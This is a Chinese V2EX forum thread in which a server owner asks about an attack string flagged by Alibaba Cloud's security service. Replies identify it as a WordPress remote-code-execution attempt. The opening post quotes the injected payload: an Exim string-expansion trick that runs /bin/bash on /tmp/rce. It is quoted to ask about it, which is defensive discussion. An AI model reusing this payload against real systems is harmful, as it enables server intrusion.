关于阿里云云盾的攻击访问分析

https://ooo.0o0.ooo/2017/05/31/592e5c3e9df87.png 阿里云的云盾，这串玩意儿是干啥 target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)

这里不应该是我服务器的 ip 或者域名吗

voocel

2017-05-31 14:11:15 +08:00

![QQ 截图 20170531135932.png]( https://ooo.0o0.ooo/2017/05/31/592e5e65eebd5.png)

voocel

2017-05-31 14:12:18 +08:00

t333st

2017-05-31 14:38:23 +08:00

尝试进行远程命令执行，可能攻击者的程序变量没替换成功就发起了请求

voocel

2017-05-31 15:32:36 +08:00

@lisonfan 一楼就是直接贴的链接，并没有显示出来，你看有什么毛病吗

voocel

2017-05-31 15:39:37 +08:00

@lisonfan 这么神奇，我自己看的的还是一个链接

laoyur

2017-05-31 15:42:04 +08:00

@lisonfan #8 你是不是装什么黑科技插件了，没有显示出来诶
v2 的正文支持 markdown，回复不支持，但回复支持 url 贴图，不过又仅支持部分 sinaimg 和 imgur ……

lisonfan

2017-05-31 15:44:49 +08:00

但是我用 Chrome 匿名模式也看着是一个链接，难道是 https://chrome.google.com/webstore/detail/v2ex-plus/daeclijmnojoemooblcbfeeceopnkolo 这个插件的功劳？

Devmingwang

2017-05-31 22:20:28 +08:00

@voocel markdown 不会用吗？请问？
![]
( https://ooo.0o0.ooo/2017/05/31/592e5e65eebd5.png)

ic3z

2017-05-31 22:59:52 +08:00

wordpress 的一个 rce
http://www.freebuf.com/vuls/133849.html

voocel

2017-06-01 00:21:11 +08:00

@ic3z 谢谢，请问我这每天总会有几个恶意 ip，这正常吗

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/364917

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.